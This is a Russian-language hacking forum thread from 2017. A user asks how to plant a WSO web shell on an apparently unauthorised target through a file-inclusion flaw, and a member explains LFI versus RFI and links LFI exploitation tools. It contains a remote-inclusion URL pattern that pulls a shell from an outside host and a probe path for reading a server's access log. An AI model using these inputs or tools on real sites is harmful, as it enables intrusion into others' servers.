PDA

Просмотр полной версии : Вопрос по [Possible] Local File Inclusion


Sensoft
09.11.2017, 21:05
httр://уязвимый-сайт/?переменная=http://сайт_где_у_нас.шелл/ну_и_сам.шелл

Если я shell залью на localhost то есть на свой сервер xampp (который стоит на пк)

httр://уязвимый-сайт/?переменная=http://localhost/WSO.php

Так подействует или нужен сайт с доменом ?

.SpoilerTarget" type="button">Spoiler: Скриншот
https://s8.hostingkartinok.com/uploads/images/2017/11/ec23d9a2066422d7731019fdf5538e78.png

grimnir
09.11.2017, 21:31
на локалхосте не подействует

найди какой-нибудь левый шелл ненужный и туда залей , оттуда уже дернешь напрямую/ Но это надо чтобы было RFI

Sensoft
09.11.2017, 21:34
grimnir said:
↑ (https://antichat.live/posts/4147969/)
на локалхосте не подействует
найди какой-нибудь левый шелл ненужный и туда залей , оттуда уже дернешь напрямую


Ссылку на shell надо ставить за место search так же ? (на скрине показан лог уязвимости)

grimnir
09.11.2017, 21:37
на скрине у тебя LFI а не RFI http://insafety.org/lfi.php

локальный инклуд означает, что есть возможность подключать и исполнять или читать файлы только в пределах уязвимого сервера по относительному пути к файлам (а точнее в пределах заданной в конфиге php open_basedir (https://hpc.name/redirector.html#http://ru.php.net/manual/ru/ini.core.php#ini.open-basedir), ибо она ограничивает доступные интерпретатору каталоги). При удалённом инклуде есть возможность подключать произвольные файлы с других серверов по их URL-адресам. RFI встречается гораздо реже, чем LFI и считается более опасной уязвимостью.

Sensoft
09.11.2017, 21:45
grimnir said:
↑ (https://antichat.live/posts/4147975/)
на скрине у тебя LFI а не RFI
http://insafety.org/lfi.php
локальный инклуд означает, что есть возможность подключать и исполнять или читать файлы только в пределах уязвимого сервера по относительному пути к файлам (а точнее в пределах заданной в конфиге php
open_basedir (https://hpc.name/redirector.html#http://ru.php.net/manual/ru/ini.core.php#ini.open-basedir)
, ибо она ограничивает доступные интерпретатору каталоги). При удалённом инклуде есть возможность подключать произвольные файлы с других серверов по их URL-адресам. RFI встречается гораздо реже, чем LFI и считается более опасной уязвимостью.


Получается залить или выполнить Shell я не могу

Sensoft
09.11.2017, 22:46
grimnir said:
↑ (https://antichat.live/posts/4147975/)
на скрине у тебя LFI а не RFI
http://insafety.org/lfi.php
локальный инклуд означает, что есть возможность подключать и исполнять или читать файлы только в пределах уязвимого сервера по относительному пути к файлам (а точнее в пределах заданной в конфиге php
open_basedir (https://hpc.name/redirector.html#http://ru.php.net/manual/ru/ini.core.php#ini.open-basedir)
, ибо она ограничивает доступные интерпретатору каталоги). При удалённом инклуде есть возможность подключать произвольные файлы с других серверов по их URL-адресам. RFI встречается гораздо реже, чем LFI и считается более опасной уязвимостью.


Эксплоиты или софт есть под эксплуатацию LFI не знаешь ? под win желательно не знаешь ? я один нашёл но он для линукса

grimnir
10.11.2017, 00:00
https://github.com/D35m0nd142/Kadabra

http://kaoticcreations.blogspot.co.uk/2011/08/automated-lfirfi-scanning-exploiting.html

https://github.com/D35m0nd142/LFISuite

https://github.com/OsandaMalith/LFiFreak

Sensoft
10.11.2017, 04:26
grimnir said:
↑ (https://antichat.live/posts/4148027/)
https://github.com/D35m0nd142/Kadabra
http://kaoticcreations.blogspot.co.uk/2011/08/automated-lfirfi-scanning-exploiting.html
https://github.com/D35m0nd142/LFISuite
https://github.com/OsandaMalith/LFiFreak


Выбрал скан указал месте славоря, всё правильно сделал ?

.SpoilerTarget" type="button">Spoiler: Фото
https://s8.hostingkartinok.com/uploads/images/2017/11/a8431ba4405e1d3b9805c9ff8c2aaa5b.png

Sensoft
10.11.2017, 04:34
grimnir said:
↑ (https://antichat.live/posts/4148027/)
https://github.com/D35m0nd142/Kadabra
http://kaoticcreations.blogspot.co.uk/2011/08/automated-lfirfi-scanning-exploiting.html
https://github.com/D35m0nd142/LFISuite
https://github.com/OsandaMalith/LFiFreak


Дал ссылку пишет что уязвимый только вот не чем не отличается от других ссылок, в чём прикол ?

http://www.site.ru/search?q=/usr/local/cpanel/logs/access_log

И ещё не до конца понимаю что значит

1) Exploiter

2) Scanner

типа 1 это эксплуатация, а 2 это сканер

grimnir
11.11.2017, 14:37
Exploiter пробует установить reverse shell

По поводу линка, высокая вероятность ложного срабатывания, т.к запрос идет поиск search?q= и сканеры очень часто пишут что возможно LFI ,но на деле не так